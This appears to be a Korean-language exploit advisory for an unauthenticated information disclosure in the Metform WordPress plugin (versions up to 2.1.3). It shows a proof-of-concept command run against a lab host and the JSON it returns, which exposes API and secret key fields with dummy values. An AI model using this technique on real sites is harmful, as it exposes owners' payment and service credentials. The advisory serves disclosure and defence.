
WordPress 플러그인 Metform <= 2.1.3 - 부적절한 접근 제어로 인한 인증되지 않은 민감 정보 노출
WordPress 플러그인 Metform <= 2.1.3 - 부적절한 접근 제어로 인증되지 않은 사용자의 민감한 정보 노출 허용
이 플러그인은 ~/core/forms/action.php 파일의 부적절한 접근 제어로 인해 민감한 정보가 노출되는 취약점이 있습니다. 이는 인증되지 않은 공격자가 PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA 등 통합된 타사 API의 모든 API 키와 비밀 키를 볼 수 있도록 악용될 수 있습니다.
bash metform.sh http://wordpress.lan
{
"form_title": "New Form # 1691056894",
"success_message": "Thank you! Form submitted successfully.",
"capture_user_browser_data": "1",
"store_entries": "1",
"entry_title": "Entry # [mf_id]",
"count_views": "1",
"redirect_to": "",
"user_email_subject": "",
"user_email_from": "",
"user_email_reply_to": "",
"user_email_body": "",
"admin_email_subject": "",
"admin_email_to": "",
"admin_email_from": "",
"admin_email_reply_to": "",
"admin_email_body": "",
"mf_mailchimp_list_id": "",
"mf_slack_webhook": "",
"mf_recaptcha_version": "recaptcha-v2",
"mf_recaptcha_site_key": "sfsdffd",
"mf_recaptcha_secret_key": "sfddsf",
"mf_recaptcha_site_key_v3": "",
"mf_recaptcha_secret_key_v3": "",
"mf_mailchimp_api_key": "asdadasdsaddas",
"input_names": "Example: [mf-inputname]",
"ckit_opt": [],
"aweber_opt": [],
"mp_opt": []
}